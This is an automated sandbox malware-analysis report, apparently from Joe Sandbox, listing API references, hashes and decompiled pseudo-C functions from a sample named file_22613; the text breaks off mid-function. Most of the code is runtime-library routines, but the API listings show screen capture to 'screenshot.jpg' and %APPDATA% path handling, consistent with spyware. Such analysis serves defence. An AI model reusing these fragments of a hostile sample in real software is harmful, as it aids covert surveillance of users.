                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrlen$H_prolog3_malloc
                                                                                • String ID:
                                                                                • API String ID: 2799043324-0
                                                                                • Opcode ID: 9593a3e882f26ebdfaf0bcf6cf8b617e22c68889b10c536c54a9677ec7e000a4
                                                                                • Instruction ID: 6016d9f24f4109661bf736fb44b3b208403491b93d93d039a9a610d1b91ad43b
                                                                                • Opcode Fuzzy Hash: 9593a3e882f26ebdfaf0bcf6cf8b617e22c68889b10c536c54a9677ec7e000a4
                                                                                • Instruction Fuzzy Hash: 48118231704208ABEF04DB65CD45BBE77A5EB94324F54842EF815DB281CBB8D945CB48
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004333A1(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                				intOrPtr _t25;
                                                                                				void* _t26;
                                                                                
                                                                                				_t28 = __ebx;
                                                                                				_t25 = _a16;
                                                                                				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                					_t26 = E00432C93(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                					goto L9;
                                                                                				} else {
                                                                                					_t35 = _t25 - 0x66;
                                                                                					if(_t25 != 0x66) {
                                                                                						__eflags = _t25 - 0x61;
                                                                                						if(_t25 == 0x61) {
                                                                                							L7:
                                                                                							_t26 = E00432D7A(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                						} else {
                                                                                							__eflags = _t25 - 0x41;
                                                                                							if(__eflags == 0) {
                                                                                								goto L7;
                                                                                							} else {
                                                                                								_t26 = E004332B4(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                							}
                                                                                						}
                                                                                						L9:
                                                                                						return _t26;
                                                                                					} else {
                                                                                						return E004331F3(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
                                                                                					}
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                • String ID:
                                                                                • API String ID: 3016257755-0
                                                                                • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                • Instruction ID: abe1810ea6ee744b6de393a6a87c1c198501608181ec6297a64f3097f06e24e9
                                                                                • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                • Instruction Fuzzy Hash: AF114B3200014ABBCF125F85DC428EE7F62FB1D355F589416FE1899131D73ACAB2AB89
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E004088DB(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t18;
                                                                                				CHAR* _t23;
                                                                                				short _t30;
                                                                                				void* _t37;
                                                                                				void* _t40;
                                                                                				void* _t41;
                                                                                
                                                                                				_t41 = __eflags;
                                                                                				_t39 = __esi;
                                                                                				_t38 = __edi;
                                                                                				_push(0x24);
                                                                                				E004219DE(E00435EE4, __ebx, __edi, __esi);
                                                                                				_t30 = 0x5c;
                                                                                				 *((short*)(_t40 - 0x30)) = _t30;
                                                                                				_t18 = E0041F4CD(_t37, _t41,  *((intOrPtr*)(_t40 + 8)), _t40 - 0x30);
                                                                                				 *((intOrPtr*)(_t40 - 0x18)) = 0xf;
                                                                                				 *((intOrPtr*)(_t40 - 0x1c)) = 0;
                                                                                				 *(_t40 - 0x2c) = 0;
                                                                                				 *((intOrPtr*)(_t40 - 4)) = 0;
                                                                                				while(_t18 != 0) {
                                                                                					E0040C640(_t40 - 0x2c, _t18);
                                                                                					E0040C640(_t40 - 0x2c, "\\");
                                                                                					__eflags =  *((intOrPtr*)(_t40 - 0x18)) - 0x10;
                                                                                					_t23 =  *(_t40 - 0x2c);
                                                                                					if(__eflags < 0) {
                                                                                						_t23 = _t40 - 0x2c;
                                                                                					}
                                                                                					CreateDirectoryA(_t23, 0);
                                                                                					_t18 = E0041F4CD(_t37, __eflags, 0, _t40 - 0x30);
                                                                                				}
                                                                                				E00402C34(_t40 - 0x2c, 1, 0);
                                                                                				return E00421A61(0, _t38, _t39);
                                                                                			}

                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 004088E2
                                                                                • _strtok.LIBCMT ref: 004088F6
                                                                                  • Part of subcall function 0041F4CD: __getptd.LIBCMT ref: 0041F4EB
                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00440C98,?,00000000,00000024,00412CED,?), ref: 00408937
                                                                                • _strtok.LIBCMT ref: 00408942
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _strtok$CreateDirectoryH_prolog3___getptd
                                                                                • String ID:
                                                                                • API String ID: 2807274917-0
                                                                                • Opcode ID: 71c84a387ab439495ae75e9d2ecf432e9ff0be3bc9304d4ad22ca9729fbe213a
                                                                                • Instruction ID: 577d3d8a7166b1bdf689bfbfa01224d28191236895ddc7b3ad4adf32f5bc5b87
                                                                                • Opcode Fuzzy Hash: 71c84a387ab439495ae75e9d2ecf432e9ff0be3bc9304d4ad22ca9729fbe213a
                                                                                • Instruction Fuzzy Hash: 970140B1D04209AEDF14EBE5E896DEE7778EB18304F50942FF210B7181DA7895448B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00431E0B() {
                                                                                				WCHAR* _t2;
                                                                                				void* _t15;
                                                                                				WCHAR* _t17;
                                                                                
                                                                                				_t2 = GetEnvironmentStringsW();
                                                                                				_t17 = _t2;
                                                                                				if(_t17 != 0) {
                                                                                					if( *_t17 != 0) {
                                                                                						goto L3;
                                                                                						do {
                                                                                							do {
                                                                                								L3:
                                                                                								_t2 =  &(_t2[1]);
                                                                                							} while ( *_t2 != 0);
                                                                                							_t2 =  &(_t2[1]);
                                                                                						} while ( *_t2 != 0);
                                                                                					}
                                                                                					_t1 = _t2 - _t17 + 2; // -2
                                                                                					_t10 = _t1;
                                                                                					_t15 = E00422FFA(_t1);
                                                                                					if(_t15 != 0) {
                                                                                						E00421230(_t15, _t17, _t10);
                                                                                					}
                                                                                					FreeEnvironmentStringsW(_t17);
                                                                                					return _t15;
                                                                                				} else {
                                                                                					return 0;
                                                                                				}
                                                                                			}







                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32(00000000,0042ACD7,00000000,00000000,76C85970,?,00420E43,00413E0B,00000000,?,?,?,?,?,?,00000000), ref: 00431E0E
                                                                                • __malloc_crt.LIBCMT ref: 00431E3D
                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?,00000000,014A10F8), ref: 00431E4A
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                • String ID:
                                                                                • API String ID: 237123855-0
                                                                                • Opcode ID: 5d716967c9fc2f86459c5dbb12a428be10c6206b913e96ae9255d42bf7896062
                                                                                • Instruction ID: d2749e336d669b7e4457df94466566cb2baf6b7ae9cf6cc8033da602753a596e
                                                                                • Opcode Fuzzy Hash: 5d716967c9fc2f86459c5dbb12a428be10c6206b913e96ae9255d42bf7896062
                                                                                • Instruction Fuzzy Hash: A3F02E375041106ACF317734BD4789B5328DEDD394716541BF801C3360F9198D4386BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __lock.LIBCMT ref: 00C717B6
                                                                                  • Part of subcall function 00C73FBC: __mtinitlocknum.LIBCMT ref: 00C73FD2
                                                                                  • Part of subcall function 00C73FBC: __amsg_exit.LIBCMT ref: 00C73FDE
                                                                                  • Part of subcall function 00C73FBC: EnterCriticalSection.KERNEL32(00C71E80,00C71E80,?,00C75AF0,00000004,00DAAC10,0000000C,00C78EA1,00000000,00C71E8F,00000000,00000000,00000000,?,00C7718C,00000001), ref: 00C73FE6
                                                                                • ___sbh_heap_check.LIBCMT ref: 00C717C0
                                                                                • HeapValidate.KERNEL32(00000000,00000000,00DAAAB0,0000000C,00C6FC85,00000000,?), ref: 00C717E2
                                                                                • GetLastError.KERNEL32 ref: 00C717EC
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterErrorHeapLastSectionValidate___sbh_heap_check__amsg_exit__lock__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 2643099450-0
                                                                                • Opcode ID: 72b0e5a69e6a713d8872eb2a5681005e3a946c9fea445d594061fa9a0197288f
                                                                                • Instruction ID: 5f661d76da6eafbe06ac23befd16c12d5b57f30215fcfebd65ca2e2fffd95d3d
                                                                                • Opcode Fuzzy Hash: 72b0e5a69e6a713d8872eb2a5681005e3a946c9fea445d594061fa9a0197288f
                                                                                • Instruction Fuzzy Hash: 3601D130940355DADB207FA99C06BAD76A0AB01772F24C215F4689A1E0C7784642EF51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E004171D3(char* __eax, char* _a4) {
                                                                                				intOrPtr* _v0;
                                                                                				intOrPtr* _t10;
                                                                                				char* _t14;
                                                                                				CHAR* _t15;
                                                                                				intOrPtr _t16;
                                                                                				int _t19;
                                                                                				void* _t20;
                                                                                				CHAR* _t22;
                                                                                
                                                                                				_t22 = __eax;
                                                                                				_t14 = StrStrA(__eax, _a4);
                                                                                				if(_t14 != 0) {
                                                                                					_t19 = _t14 - _t22;
                                                                                					_t22 = 0x44a450;
                                                                                					lstrcpynA(0x44a450, 0x44a450, _t19);
                                                                                					_t10 = _v0;
                                                                                					_t3 =  &(0x44a450[_t19]); // 0x44a450
                                                                                					_t15 = _t3;
                                                                                					 *_t15 = 0;
                                                                                					_t20 = _t10 + 1;
                                                                                					do {
                                                                                						_t16 =  *_t10;
                                                                                						_t10 = _t10 + 1;
                                                                                					} while (_t16 != 0);
                                                                                					wsprintfA(_t15, "%s%s", _a4, _t10 - _t20 + _t14);
                                                                                				}
                                                                                				return _t22;
                                                                                			}












                                                                                APIs
                                                                                • StrStrA.SHLWAPI(?,00409ABC,00000104,00000000,00409ABC,%APPDATA%,00000000), ref: 004171DC
                                                                                • lstrcpynA.KERNEL32(0044A450,?,00000000,00000000), ref: 004171F5
                                                                                • wsprintfA.USER32 ref: 00417221
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpynwsprintf
                                                                                • String ID: %s%s
                                                                                • API String ID: 1799455324-3252725368
                                                                                • Opcode ID: 432519dee97816f7c9a1de608d8b34805c578aef681daadeccc2c5a4f0f4145e
                                                                                • Instruction ID: ef5c4c7bbc0261b9d93d7aad86dca49cd2d2d625cfccfd17ad4a467fd7bb5884
                                                                                • Opcode Fuzzy Hash: 432519dee97816f7c9a1de608d8b34805c578aef681daadeccc2c5a4f0f4145e
                                                                                • Instruction Fuzzy Hash: F2F02B352002126FE3114F288C8CD9BBFA9EF86254B040466FA40C3310CB76D829839A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 31%
                                                                                			E0041786A(void* __ecx, CHAR* _a4) {
                                                                                				void* _v8;
                                                                                				char _v12;
                                                                                				char* _t6;
                                                                                				intOrPtr _t8;
                                                                                				void* _t14;
                                                                                
                                                                                				_t14 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
                                                                                				if(_t14 != 0xffffffff) {
                                                                                					_t6 =  &_v12;
                                                                                					__imp__GetFileSizeEx(_t14, _t6);
                                                                                					_push(_t14);
                                                                                					if(_t6 != 0) {
                                                                                						CloseHandle();
                                                                                						_t8 = _v12;
                                                                                					} else {
                                                                                						CloseHandle();
                                                                                						goto L1;
                                                                                					}
                                                                                				} else {
                                                                                					L1:
                                                                                					_t8 = 0;
                                                                                				}
                                                                                				return _t8;
                                                                                			}









                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00409882,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00409882,?), ref: 00417885
                                                                                • GetFileSizeEx.KERNEL32(00000000,00409882,?,?,?,00409882,?), ref: 0041789D
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00409882,?), ref: 004178A8
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00409882,?), ref: 004178B0
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileHandle$CreateSize
                                                                                • String ID:
                                                                                • API String ID: 4148174661-0
                                                                                • Opcode ID: 698f352844b2797ff7410bdc639b1352edd1824ad24c8aafbb85ec6769950ff7
                                                                                • Instruction ID: 6c9d8c31a0d3b5022869ef95340bd8bcf673287835e153943df70c3ee11a0417
                                                                                • Opcode Fuzzy Hash: 698f352844b2797ff7410bdc639b1352edd1824ad24c8aafbb85ec6769950ff7
                                                                                • Instruction Fuzzy Hash: 14F08235644215FBE724AB60DC0DFDA7A7CEB45760F208125FE01B21D0E7B46A81C6AD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 31%
                                                                                			E004178C1(void* __ecx, WCHAR* _a4) {
                                                                                				void* _v8;
                                                                                				char _v12;
                                                                                				char* _t6;
                                                                                				intOrPtr _t8;
                                                                                				void* _t14;
                                                                                
                                                                                				_t14 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
                                                                                				if(_t14 != 0xffffffff) {
                                                                                					_t6 =  &_v12;
                                                                                					__imp__GetFileSizeEx(_t14, _t6);
                                                                                					_push(_t14);
                                                                                					if(_t6 != 0) {
                                                                                						CloseHandle();
                                                                                						_t8 = _v12;
                                                                                					} else {
                                                                                						CloseHandle();
                                                                                						goto L1;
                                                                                					}
                                                                                				} else {
                                                                                					L1:
                                                                                					_t8 = 0;
                                                                                				}
                                                                                				return _t8;
                                                                                			}









                                                                                APIs
                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,004086DD,?,00000001), ref: 004178DC
                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004086DD,?,00000001), ref: 004178F4
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,004086DD,?,00000001), ref: 004178FF
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,004086DD,?,00000001), ref: 00417907
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseFileHandle$CreateSize
                                                                                • String ID:
                                                                                • API String ID: 4148174661-0
                                                                                • Opcode ID: f8a1c995e8f40240364e52f70c7ca4c262f4a0b4571d2587a88581e847a714b6
                                                                                • Instruction ID: 4a6acde8d417ce3ed1d252b1c6b4b85539ff2511fc7dbcf8801c22f2a3f09152
                                                                                • Opcode Fuzzy Hash: f8a1c995e8f40240364e52f70c7ca4c262f4a0b4571d2587a88581e847a714b6
                                                                                • Instruction Fuzzy Hash: 07F08275644214BBEB249B60DC09FDF7ABCEB05760F204121FE01A21D0EBB46B51966D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • __getptd.LIBCMT ref: 00C723CC
                                                                                  • Part of subcall function 00C771DA: __getptd_noexit.LIBCMT ref: 00C771DD
                                                                                  • Part of subcall function 00C771DA: __amsg_exit.LIBCMT ref: 00C771EA
                                                                                • __getptd.LIBCMT ref: 00C723E3
                                                                                • __amsg_exit.LIBCMT ref: 00C723F1
                                                                                • __lock.LIBCMT ref: 00C72401
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                • String ID:
                                                                                • API String ID: 3521780317-0
                                                                                • Opcode ID: 575125beede718350792d7a922c35859f1894dce783ae20386863a3b081dfee2
                                                                                • Instruction ID: 2d4c9a01219c32c293c6145f0e82961ee3883ccc71b821e9c0e22122055af71a
                                                                                • Opcode Fuzzy Hash: 575125beede718350792d7a922c35859f1894dce783ae20386863a3b081dfee2
                                                                                • Instruction Fuzzy Hash: 18F06D32904704CBD720BB749802B5D72A4AF00721F10C249E8A8973E1DB78AA05EB61
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 50%
                                                                                			E00417D56() {
                                                                                				char _v8;
                                                                                				int _v12;
                                                                                				int _v16;
                                                                                				int _v20;
                                                                                				int _v24;
                                                                                				void* __ebx;
                                                                                				int _t10;
                                                                                				void* _t12;
                                                                                
                                                                                				_v24 = 1;
                                                                                				_v20 = 0;
                                                                                				_v16 = 0;
                                                                                				_v12 = 0;
                                                                                				__imp__GdiplusStartup( &_v8,  &_v24, 0);
                                                                                				_t10 = GetSystemMetrics(0);
                                                                                				_t12 = E00417C86(GetSystemMetrics(1), _t10);
                                                                                				__imp__GdiplusShutdown(_v8);
                                                                                				return _t12;
                                                                                			}












                                                                                APIs
                                                                                • GdiplusStartup.GDIPLUS(?,?,00000000,?,00000000), ref: 00417D79
                                                                                • GetSystemMetrics.USER32(00000000), ref: 00417D80
                                                                                • GetSystemMetrics.USER32(00000001), ref: 00417D8A
                                                                                  • Part of subcall function 00417C86: CreateCompatibleDC.GDI32(00000000), ref: 00417C9D
                                                                                  • Part of subcall function 00417C86: GetDC.USER32(00000000), ref: 00417CA9
                                                                                  • Part of subcall function 00417C86: CreateCompatibleBitmap.GDI32(00000000), ref: 00417CB0
                                                                                  • Part of subcall function 00417C86: SelectObject.GDI32(?,00000000), ref: 00417CBD
                                                                                  • Part of subcall function 00417C86: GetDC.USER32(00000000), ref: 00417CCB
                                                                                  • Part of subcall function 00417C86: BitBlt.GDI32(?,00000000,00000000,00000000,00000000,00000000), ref: 00417CD9
                                                                                  • Part of subcall function 00417C86: GdipAlloc.GDIPLUS(00000010,?,?,?,?,?,?,00417D99), ref: 00417CE1
                                                                                  • Part of subcall function 00417C86: GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?,?,?,?,?,?,?,00417D99), ref: 00417CFE
                                                                                  • Part of subcall function 00417C86: GdipSaveImageToFile.GDIPLUS(?,screenshot.jpg,?,00000000,?,?,?,?,?,?,00417D99), ref: 00417D28
                                                                                  • Part of subcall function 00417C86: DeleteObject.GDI32(?), ref: 00417D40
                                                                                • GdiplusShutdown.GDIPLUS(?), ref: 00417D9C
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateGdip$BitmapCompatibleGdiplusMetricsObjectSystem$AllocDeleteFileFromImageSaveSelectShutdownStartup
                                                                                • String ID:
                                                                                • API String ID: 2538933268-0
                                                                                • Opcode ID: 49702849efac5d4f4e4b2176bcbdff8bd81fb89eb20b0933485709c1d1af3823
                                                                                • Instruction ID: 1f9ffcf39aaceb940411d9bfa7d7d9f7a6648eb9fc6deacf9e725d6300546b30
                                                                                • Opcode Fuzzy Hash: 49702849efac5d4f4e4b2176bcbdff8bd81fb89eb20b0933485709c1d1af3823
                                                                                • Instruction Fuzzy Hash: 35F012B6D41228ABCB01AFE49D499CEBBBCEB08745F1001A6F911E2251D7B55B008BE5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E00414F20(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t21;
                                                                                				intOrPtr* _t23;
                                                                                				intOrPtr* _t25;
                                                                                				void* _t26;
                                                                                				void* _t27;
                                                                                
                                                                                				_t27 = __eflags;
                                                                                				_t22 = __edi;
                                                                                				_t17 = __ebx;
                                                                                				_push(0);
                                                                                				E00421975(E00435C5D, __ebx, __edi, __esi);
                                                                                				_t25 =  *((intOrPtr*)(_t26 + 8));
                                                                                				 *_t25 = 0x441164;
                                                                                				E0041D5C1(_t25 + 4, __edi, _t27);
                                                                                				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                                                                                				_t23 = E0041EB16(__ebx, _t21, _t22, _t25, _t27, 4);
                                                                                				_t28 = _t23;
                                                                                				if(_t23 == 0) {
                                                                                					_t23 = 0;
                                                                                					__eflags = 0;
                                                                                				} else {
                                                                                					 *_t23 = E0041D9C9(_t17, _t23, _t25, _t28);
                                                                                					E0040F13E(E0041D788());
                                                                                				}
                                                                                				 *((intOrPtr*)(_t25 + 0x38)) = _t23;
                                                                                				E00414F89(_t25);
                                                                                				return E00421A4D(_t25);
                                                                                			}









                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00414F27
                                                                                • std::_Mutex::_Mutex.LIBCPMT ref: 00414F38
                                                                                  • Part of subcall function 0041EB16: _malloc.LIBCMT ref: 0041EB30
                                                                                • std::locale::_Init.LIBCPMT ref: 00414F4F
                                                                                  • Part of subcall function 0041D9C9: __EH_prolog3.LIBCMT ref: 0041D9D0
                                                                                  • Part of subcall function 0041D9C9: std::_Lockit::_Lockit.LIBCPMT ref: 0041D9E6
                                                                                  • Part of subcall function 0041D9C9: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0041DA08
                                                                                  • Part of subcall function 0041D9C9: std::locale::_Setgloballocale.LIBCPMT ref: 0041DA12
                                                                                  • Part of subcall function 0041D9C9: _Yarn.LIBCPMT ref: 0041DA28
                                                                                  • Part of subcall function 0041D9C9: std::locale::facet::_Incref.LIBCPMT ref: 0041DA35
                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 00414F5D
                                                                                  • Part of subcall function 0040F13E: std::_Lockit::_Lockit.LIBCPMT ref: 0040F14A
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: std::_std::locale::_$H_prolog3IncrefLockitLockit::_std::locale::facet::_$InitLocimpLocimp::_MutexMutex::_SetgloballocaleYarn_malloc
                                                                                • String ID:
                                                                                • API String ID: 3596770912-0
                                                                                • Opcode ID: 61c5aea4bcfa2bd0f00cdd6745375330b01388331214941ca36b9c87dc93c8e6
                                                                                • Instruction ID: 9851b0f838591f8a9e8e56e7ff5b8229f0e4ffa2096a1d1dd3cabf10c950164d
                                                                                • Opcode Fuzzy Hash: 61c5aea4bcfa2bd0f00cdd6745375330b01388331214941ca36b9c87dc93c8e6
                                                                                • Instruction Fuzzy Hash: 7EF0EDB1A00302CBD710BBB7A40279EA2D1AFA0718F20042FB1418B791DF3CA982874D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00403C13(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t13;
                                                                                				intOrPtr* _t17;
                                                                                				intOrPtr* _t20;
                                                                                				intOrPtr* _t23;
                                                                                				intOrPtr _t25;
                                                                                				intOrPtr* _t27;
                                                                                				intOrPtr _t31;
                                                                                				intOrPtr* _t34;
                                                                                				void* _t35;
                                                                                
                                                                                				_t23 = _a4;
                                                                                				_t13 =  *((intOrPtr*)(_t23 + 0x10));
                                                                                				_t34 = __ecx;
                                                                                				_t25 = _a8;
